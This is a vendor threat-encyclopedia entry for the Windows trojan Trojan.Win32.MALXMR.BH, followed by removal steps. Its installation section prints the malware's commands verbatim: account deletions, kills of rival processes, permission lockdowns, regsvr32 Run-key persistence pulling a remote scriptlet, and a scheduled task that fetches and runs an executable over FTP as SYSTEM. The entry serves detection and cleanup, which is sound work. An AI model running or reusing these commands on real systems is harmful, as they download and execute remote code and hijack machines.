Trojan.Win32.MALXMR.BH


 ALIASES:

Trojan:Win32/Execution!rfn (Microsoft); RDN/GenDownloader.avx (McAfee); Trojan.VBS.Starter.lr (Kaspersky); Trojan.Win32.Generic!BT (Sunbelt)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted:

  • In the wild: Yes

  OVERVIEW


This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size:

302,510 bytes

File Type:

EXE

Memory Resident:

Yes

Initial Samples Received Date:

21 Jan 2020

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan adds the following processes:

  • "%System%\WScript.exe" "%Windows%\inf\n.vbs"
  • %Windows%\inf\n.vbs
  • "%Windows%\inf\c3.bat"
  • %Windows%\inf\c3.bat
  • net1 user mm123$ /del
  • net1 user admin$ /del
  • net1 user sysadm05 /del
  • net stop AnyDesk
  • sc config AnyDesk start= disabled
  • attrib -s -h -r %System Root%\{username}s\Default\AppData\Local\Temp\*.exe
  • attrib -s -h -r %System Root%\{username}s\Default\AppData\Roaming\Tempo\*.exe
  • attrib -s -h -r %System Root%\{username}s\Default\AppData\Roaming\*.exe
  • attrib -s -h -r %System Root%\{username}s\{username}\AppData\Local\Temp\*.exe
  • attrib -s -h -r %System Root%\{username}s\{username}\AppData\Roaming\Tempo\*.exe
  • attrib -s -h -r %System Root%\{username}s\{username}\AppData\Roaming\*.exe
  • attrib -s -h -r %{username} Temp%\*.exe
  • attrib -s -h -r %Application Data%\Tempo\*.exe
  • attrib -s -h -r %Application Data%\*.exe
  • taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe
  • cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d system
  • cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d system
  • cacls "%System Root%\Program Files\autodesk\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\autodesk\*.exe" /e /d system
  • cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d system
  • cacls "%Program Files%\RemoteDesk\*.exe" /e /d everyone
  • cacls "%Program Files%\RemoteDesk\*.exe" /e /d system
  • cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
  • cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d system
  • cacls "%Program Files%\autodesk\*.exe" /e /d everyone
  • cacls "%Program Files%\autodesk\*.exe" /e /d system
  • cacls "%Program Files%\anydesk\*.exe" /e /d system
  • cacls "%Program Files%\anydesk\*.exe" /e /d everyone
  • cacls %Windows%\debug\WIA\*.exe /e /d everyone
  • cacls %System Root%\{username}s\{username}\AppData\Roaming\Tempo\*.exe /e /d everyone
  • cacls %Application Data%\Tempo /e /d everyone
  • cacls %System Root%\{username}s\{username}\AppData\Roaming\Tempo\*.exe /e /d system
  • cacls %System Root%\{username}s\Default\AppData\Roaming\Tempo\*.exe /e /d everyone
  • cacls %Application Data%\Tempo /e /d system
  • cacls %System Root%\{username}s\Default\AppData\Roaming\Tempo /e /d system
  • cacls %System Root%\{username}s\Default\AppData\Roaming\Tempo /e /d everyone
  • cacls %System Root%\{username}s\Default\AppData\Roaming\Tempo\*.exe /e /d system
  • cacls %System Root%\{username}s\{username}\AppData\Roaming\*.exe /e /g everyone:f
  • cacls %Application Data% /e /g everyone:f
  • cacls %System Root%\{username}s\{username}\AppData\Local\Temp /e /g system:f
  • cacls %System Root%\{username}s\{username}\AppData\Local\Temp /e /g everyone:f
  • cacls %{username} Temp% /e /g system:f
  • cacls %{username} Temp% /e /g everyone:f
  • cacls %System Root%\{username}s\Default\AppData\Local\Temp /e /g everyone:f
  • cacls %System Root%\{username}s\Default\AppData\Roaming /e /g everyone:f
  • cacls %System Root%\{username}s\Default\AppData\Roaming /e /g system:f
  • cacls %System Root%\{username}s\Default\AppData\Local\Temp\*.exe /e /g everyone:f
  • cacls %System Root%\{username}s\Default\AppData\Roaming\*.exe /e /g everyone:f
  • cacls %System Root%\{username}s\Default\AppData\Roaming\*.exe /e /g system:f
  • cacls %System Root%\SysData\*.exe /e /d system
  • cacls %System Root%\Msupdate /e /d system
  • cacls %Windows%\xcecg /e /d system
  • cacls %Windows%\ccm /e /d system
  • cacls %Windows%\smss.exe /e /d system
  • cacls "%System Root%\Program Files\Common Files\Services\*.exe" /e /d system
  • cacls %System%\a.exe /e /d system
  • cacls %Windows%\security\*.exe /e /d system
  • cacls %Windows%\security\*.exe /e /d everyone
  • cacls %Windows%\Resources\*.exe /e /d system
  • cacls %Windows%\Resources\*.exe /e /d everyone
  • cacls %Windows%\Resources\Themes\*.exe /e /d system
  • cacls %Windows%\Resources\Themes\*.exe /e /d everyone
  • cacls %Windows%\system\lsmsm.exe /e /d system
  • cacls %All {username}s Profile%\homegroup\*.exe /e /d system
  • cacls %All {username}s Profile%\diskdata\*.exe /e /d system
  • cacls "%System Root%\Program Files\Microsoft Updates" /e /d system
  • cacls %System%\servwdrv.dll /e /d system
  • cacls %System%\servwdrv.dll /e /d everyone
  • cacls %System%\servwdrvx.dll /e /d system
  • cacls %System%\servwdrvx.dll /e /d everyone
  • cacls %System%\serwwdrv.dll /e /d system
  • cacls %System%\serwwdrv.dll /e /d everyone
  • cacls %Windows%\svchost.exe /e /d system
  • cacls %All {username}s Profile%\WmiAppSrv\svchost.exe /e /d system
  • cacls %Windows%\Help\taskhost.exe /e /d system
  • cacls %Windows%\Web\wininit.exe /e /d system
  • cacls %All {username}s Profile%\Microsoft\WmiAppSvr\csrss.exe /e /d system
  • cacls %System Root%\Progra~1\Common~1\svshpst.exe /e /d system
  • cacls %Fonts%\system32\svchost.exe /e /d system
  • cacls %Fonts%\*.exe /e /d system
  • cacls %Fonts%\Microsoft /e /d system
  • cacls "%Windows%\Temp\32p.zip \xc2\xaa\xe2\x95\xa0?\xc2\xbf\xc3\xb3\xc2\xbf\xe2\x94\xa4\xc2\xbf\xe2\x95\x91\xc3\xad\xe2\x94\x94???? 1\*.*" /e /d system
  • cacls "%Fonts%\*.exe" /e /d system
  • cacls %Windows%\taskmgrs.exe /e /d system
  • cacls %Windows%\security\IIS\*.exe /e /d system
  • cacls %System Root%\Progra~1\Common~1\System\*.exe /e /d system
  • cacls %System Root%\Progra~1\dll\*.exe /e /d system
  • cacls %System Root%\Progra~1\Common~1\Services\*.exe /e /d system
  • cacls %System Root%\Progra~1\Common~1\SpeechEngines\*.exe /e /d system
  • cacls %Fonts%\system32\*.exe /e /d system
  • cacls %Windows%\SpeechsTracing\*.exe /e /d system
  • cacls "%Program Files%\Microsoft SvidiaTen\*.exe" /e /d system
  • %System%\cacls.exe cacLS %System Root%\Progra~1\Common~1\Micros~1\*.exe /e /d system
  • cacls %System Root%\System\*.exe /e /d system
  • cacls %Windows%\1\*.exe /e /d system
  • cacls %System Root%\users\public\*.exe /e /d system
  • cacls "%System Root%\Program Files\Common Files\conime.exe" /e /d system
  • cacls "%Program Files%\Common Files\conime.exe" /e /d system
  • cacls %System Root%\Progra~1\test\*.exe /e /d everyone
  • cacls %Fonts%\help\*.exe /e /d system
  • cacls %Windows%\web\*.exe /e /d system
  • cacls "%System Root%\Program Files\SQLWriter$\*.exe" /e /d system
  • cacls %Windows%\Prefetch\*.exe /e /d system
  • cacls %All {username}s Profile%\WmiAppSvr\*.exe /e /d system
  • cacls %Fonts%\Mysql\*.exe /e /d system
  • cacls %Windows%\SysWOW64\drivers\taskmgr.exe /e /d system
  • cacls %Windows%\SysWOW64\drivers\svchost.exe /e /d system
  • cacls %Windows%\temp\svchost.exe /e /d system
  • cacls %Fonts%\Windows\*.exe /e /d system
  • cacls %All {username}s Profile%\Temp\*.exe /e /d system
  • cacls %System Root%\{username}s\Public\Music\*.exe /e /d everyone
  • cacls %System Root%\{username}s\Public\Music\*.vbs /e /d system
  • cacls %Windows%\Help\lsass.exe /e /d system
  • cacls %Windows%\temp\*.dll /e /d system
  • cacls %Windows%\debug\Nat\*.exe /e /d system
  • cacls %Windows%\Registration\*.exe /e /d system
  • cacls "%Program Files%\Microsoft Blliasc\*.*" /e /d system
  • cacls %Windows%\system\lsaus.exe /e /d system
  • cacls "%All {username}s Profile%\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • cacls "%All {username}s Profile%\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • cacls "%All {username}s Profile%\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system
  • cacls %All {username}s Profile%\Microsoft\HelpLibrary\*.dll /e /d system
  • cacls %Windows%\WBEM\ccproxy\*.exe /e /d system
  • cacls %All {username}s Profile%\Microsoft\Network\*.exe /e /d system
  • cacls %Windows%\mysql.log /e /d system
  • reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f
  • reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f
  • reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v "start1" /f
  • reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "SHELL" /f
  • %System%\cmd.exe /S /D /c" echo y"
  • %System%\cmd.exe /S /D /c" rd /s /q %Windows%\help\lsmosee.exe"
  • %System%\cmd.exe /S /D /c" rd /s /q %Windows%\debug\lsmosee.exe"
  • net start MSSQLSERVER
  • schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.0603bye.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe" /ru "system" /sc onstart /F
  • %System%\net1 stop AnyDesk
  • %System%\svchost.exe -k netsvcs
  • %Windows%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  • %Windows%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  • %System%\svchost.exe -k LocalServiceAndNoImpersonation
  • %System%\sppsvc.exe
  • "%System Root%\Program Files\Windows Media Player\wmpnetwk.exe"
  • %System%\net1 start MSSQLSERVER

It creates the following folders:

  • %Windows%\ServiceProfiles\NetworkService\AppData\Local\Microsoft

(Note: %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

Other System Modifications

This Trojan deletes the following files:

  • %Windows%\Tasks\Mysa1.job
  • %Windows%\splwow64.exe
  • %Windows%\Tasks\Mysa.job

(Note: %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

It deletes the following folders:

  • %Windows%\debug\lsmosee.exe
  • %Windows%\debug\lsmose.exe
  • %Windows%\Help\lsmose.exe
  • %Windows%\Help\lsmosee.exe

(Note: %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

It adds the following registry entries:

HKEY_CURRENT_USER\Software\WinRAR SFX
C%%Windows%inf = "%Windows%\inf"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Run
start = "regsvr32 /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll"

It deletes the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Run\start1

HKEY_CURRENT_USER\Software\Microsoft\
Windows NT\CurrentVersion\Winlogon\
SHELL

Dropping Routine

This Trojan drops the following files:

  • %AppDataLocal%\Microsoft\Media Player\CurrentDatabase_372.wmdb
  • %All {username}s Profile%\Microsoft\Windows\DRM\drmstore.hds
  • %Windows%\inf\n.vbs
  • %Windows%\inf\c3.bat
  • %All {username}s Profile%\Microsoft\Windows\DRM\v3ks.sec

(Note: %AppDataLocal% is the Local Application Data folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

This report is generated via an automated analysis system.

  SOLUTION

Minimum Scan Engine:

9.850

Step 1

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 2

Identify and terminate files detected as Trojan.Win32.MALXMR.BH

[ Learn More ]
  1. Windows Task Manager may not display all running processes. In this case, please use a third-party process viewer, preferably Process Explorer, to terminate the malware/grayware/spyware file. You may download the said tool here.
  2. If the detected file is displayed in either Windows Task Manager or Process Explorer but you cannot delete it, restart your computer in safe mode. To do this, refer to this link for the complete steps.
  3. If the detected file is not displayed in either Windows Task Manager or Process Explorer, continue doing the next steps.

Step 3

Delete this registry value

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_CURRENT_USER\Software\WinRAR SFX
    • C%%Windows%inf = "%Windows%\inf"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
    • start = "regsvr32 /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll"

Step 4

Search and delete these components

[ Learn More ]
There may be some components that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.
  • %AppDataLocal%\Microsoft\Media Player\CurrentDatabase_372.wmdb
  • %All {username}s Profile%\Microsoft\Windows\DRM\drmstore.hds
  • %Windows%\inf\n.vbs
  • %Windows%\inf\c3.bat
  • %All {username}s Profile%\Microsoft\Windows\DRM\v3ks.sec

Step 5

Search and delete this folder

[ Learn More ]
Please make sure you check the Search Hidden Files and Folders checkbox in the More advanced options option to include all hidden folders in the search result.
  • %Windows%\ServiceProfiles\NetworkService\AppData\Local\Microsoft

Step 6

Scan your computer with your Trend Micro product to delete files detected as Trojan.Win32.MALXMR.BH. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:

Step 7

Restore this file from backup only Microsoft-related files will be restored. If this malware/grayware also deleted files related to programs that are not from Microsoft, please reinstall those programs on you computer again.

  • %Windows%\Tasks\Mysa1.job
  • %Windows%\splwow64.exe
  • %Windows%\Tasks\Mysa.job

Step 8

Restore these deleted registry keys/values from backup

*Note: Only Microsoft-related keys/values will be restored. If the malware/grayware also deleted registry keys/values related to programs that are not from Microsoft, please reinstall those programs on your computer.

  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
    • start1
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    • SHELL


Did this description help? Tell us how we did.